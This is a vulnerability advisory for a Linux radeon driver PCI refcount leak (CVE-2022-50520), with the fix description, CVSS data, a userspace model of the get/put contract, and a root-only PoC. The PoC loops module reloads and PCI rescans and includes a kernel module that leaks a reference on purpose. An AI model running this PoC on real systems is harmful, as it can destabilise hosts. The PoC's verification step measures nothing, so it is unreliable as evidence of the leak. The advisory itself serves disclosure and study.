Security Vulnerability Report
CVE-2022-50520 CVSS 5.5 MEDIUM

CVE-2022-50520

Published: 2025-10-07 16:15:36
Last Modified: 2026-03-17 14:13:16
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

drm/radeon: Fix PCI device refcount leak in radeon_atrm_get_bios()

As comment of pci_get_class() says, it returns a pci_device with its refcount increased and decreased the refcount for the input parameter @from if it is not NULL.

If we break the loop in radeon_atrm_get_bios() with 'pdev' not NULL, we need to call pci_dev_put() to decrease the refcount. Add the missing pci_dev_put() to avoid refcount leak.
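The get/put contract described above, as an added userspace model (not kernel code and not part of the original advisory or patch). All `model_*` names and the three-device table are constructed for illustration; the iterator only imitates the documented pci_get_class() behaviour of taking a reference on the returned device and dropping the one on `from`.

```c
#include <stddef.h>
#include <stdio.h>

#define MODEL_VENDOR_ATI 0x1002u            /* value of PCI_VENDOR_ID_ATI */

struct model_dev { unsigned vendor; int refcount; };   /* constructed stand-in */

static struct model_dev *model_get(struct model_dev *d) { if (d) d->refcount++; return d; }
static void model_put(struct model_dev *d) { if (d) d->refcount--; }  /* NULL-safe, like pci_dev_put() */

/* Iterator with the documented contract: reference taken on the device
 * returned, reference dropped on 'from' when it is not NULL. */
static struct model_dev *model_get_next(struct model_dev *devs, size_t n,
                                        struct model_dev *from)
{
    size_t i = from ? (size_t)(from - devs) + 1 : 0;
    struct model_dev *next = (i < n) ? model_get(&devs[i]) : NULL;

    model_put(from);
    return next;
}

/* Lookup loop in the shape the description gives: break on a match.
 * fixed == 0 omits the put after the break; fixed == 1 adds it. */
static int model_find_dev(struct model_dev *devs, size_t n, int fixed)
{
    struct model_dev *pdev = NULL;
    int found = 0;

    while ((pdev = model_get_next(devs, n, pdev)) != NULL) {
        if (pdev->vendor == MODEL_VENDOR_ATI) { found = 1; break; }
    }
    if (fixed)
        model_put(pdev);    /* the reference held at the break is released */
    return found;
}

/* References still outstanding on the matched device after 'calls' lookups. */
static int model_leaked_refs(int fixed, int calls)
{
    struct model_dev devs[3] = { {0x8086u, 1}, {MODEL_VENDOR_ATI, 1}, {0x10deu, 1} };

    for (int i = 0; i < calls; i++)
        model_find_dev(devs, 3, fixed);
    return devs[1].refcount - 1;            /* 1 is the baseline reference */
}

int main(void)
{
    printf("without put: %d leaked, with put: %d leaked\n",
           model_leaked_refs(0, 5), model_leaked_refs(1, 5));
    return 0;
}
```

Devices passed over before the match stay balanced because the iterator drops them on the next step; only the device held at the `break` needs the explicit put.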

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux kernel < 5.10.150
Linux kernel 5.11.x ~ 5.15.x (affected)
Linux kernel 5.16.x ~ 5.19.x (affected)
Linux kernel 6.0.x (affected)
All Linux kernel versions that include the drm/radeon subsystem

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// PoC: Triggering PCI device refcount leak in radeon_atrm_get_bios()
// This PoC demonstrates how to trigger the vulnerability by repeatedly
// loading/unloading the radeon driver module
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>

// Method 1: Trigger via modprobe loop
// Requires root privileges and a system with Radeon GPU
void trigger_via_modprobe_loop(void)
{
    printf("Triggering refcount leak via radeon module reload...\n");
    for (int i = 0; i < 1000; i++) {
        // Unload radeon module (may fail if in use)
        system("rmmod radeon 2>/dev/null");
        usleep(100000);
        // Reload radeon module
        system("modprobe radeon 2>/dev/null");
        usleep(100000);
    }
    printf("Module reloaded 1000 times. Check refcount:\n");
    system("ls /sys/bus/pci/devices/ | head -5");
}

// Method 2: Trigger via sysfs hotplug events
void trigger_via_sysfs_rescan(void)
{
    printf("Triggering refcount leak via PCI rescan...\n");
    FILE *f = fopen("/sys/bus/pci/rescan", "w");
    if (f) {
        for (int i = 0; i < 100; i++) {
            fprintf(f, "1\n");
            fflush(f);
            usleep(50000);
        }
        fclose(f);
    }
}

// Method 3: Direct kernel module to trigger the vulnerable function
// (requires writing a kernel module)
/*
#include <linux/module.h>
#include <linux/pci.h>

static int __init trigger_refcount_leak_init(void)
{
    struct pci_dev *pdev = NULL;

    // This loop mirrors the pci_get_class() lookup pattern in radeon_atrm_get_bios()
    // Breaking out without pci_dev_put() leaks one reference on the matched PCI device
    while ((pdev = pci_get_class(PCI_CLASS_DISPLAY_VGA << 8, pdev)) != NULL) {
        if (pdev->vendor == PCI_VENDOR_ID_ATI) {
            // Simulating the vulnerable code path
            // In real vulnerable code: break without pci_dev_put(pdev)
            printk(KERN_INFO "Found ATI device: %s\n", pci_name(pdev));
            // MISSING: pci_dev_put(pdev); <-- This is the bug
            break; // Bug: refcount leak here
        }
    }
    return 0;
}

static void __exit trigger_refcount_leak_exit(void)
{
    printk(KERN_INFO "Module unloaded\n");
}

module_init(trigger_refcount_leak_init);
module_exit(trigger_refcount_leak_exit);
MODULE_LICENSE("GPL");
*/

int main(void)
{
    if (getuid() != 0) {
        printf("This PoC requires root privileges.\n");
        return 1;
    }
    trigger_via_modprobe_loop();
    trigger_via_sysfs_rescan();
    printf("PoC execution complete.\n");
    printf("Monitor system stability and dmesg for errors.\n");
    return 0;
}

References

Raw JSON Data
